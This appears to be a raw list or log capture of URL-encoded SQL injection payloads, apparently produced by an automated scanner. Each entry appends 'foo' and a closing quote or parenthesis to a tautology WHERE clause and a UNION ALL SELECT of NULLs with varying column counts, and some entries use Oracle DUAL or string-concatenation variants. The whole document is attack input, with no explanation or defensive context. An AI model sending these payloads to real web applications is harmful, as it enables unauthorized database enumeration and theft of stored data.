foo%29%20WHERE%201946%3D1946%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%202296%3D2296%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%201687%3D1687%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%208036%3D8036%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%203147%3D3147%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%207625%3D7625%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%206835%3D6835%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%207016%3D7016%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%204728%3D4728%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%204069%3D4069%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%206048%3D6048%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%204216%3D4216%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%204476%3D4476%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%208360%3D8360%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%206761%3D6761%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%209043%3D9043%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%203492%3D3492%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%207424%3D7424%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%203841%3D3841%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%203458%3D3458%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%203843%3D3843%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%207749%3D7749%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%201480%3D1480%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%209127%3D9127%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%208122%3D8122%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%202213%3D2213%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%202674%3D2674%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%205183%3D5183%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%201250%3D1250%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%201751%3D1751%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%209726%3D9726%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%205433%3D5433%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%203475%3D3475%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%202870%3D2870%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%207152%3D7152%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27yKJT%27%20FROM%20DUAL%20WHERE%203362%3D3362%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27GMip%27%20FROM%20DUAL%20WHERE%209464%3D9464%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27bklX%27%20FROM%20DUAL%20WHERE%207532%3D7532%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27ZoOy%27%20FROM%20DUAL%20WHERE%203182%3D3182%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27ZWpi%27%20FROM%20DUAL%20WHERE%202937%3D2937%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27ITqc%27%20FROM%20DUAL%20WHERE%206978%3D6978%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27FTuY%27%20FROM%20DUAL%20WHERE%208661%3D8661%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27zvZE%27%20FROM%20DUAL%20WHERE%206024%3D6024%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27wdBH%27%20FROM%20DUAL%20WHERE%209381%3D9381%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27ALPv%27%20FROM%20DUAL%20WHERE%201975%3D1975%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27JDNC%27%20WHERE%207641%3D7641%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27TjBX%27%20WHERE%206694%3D6694%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27GmEt%27%20WHERE%208623%3D8623%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27UKHe%27%20WHERE%209202%3D9202%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27enFh%27%20WHERE%204182%3D4182%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27sjYp%27%20WHERE%207747%3D7747%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27XVmF%27%20WHERE%204891%3D4891%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27FKHN%27%20WHERE%208173%3D8173%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27Apkc%27%20WHERE%203652%3D3652%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27urah%27%20WHERE%205498%3D5498%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20QXVN%20WHERE%208279%3D8279%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20jiQI%20WHERE%205363%3D5363%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 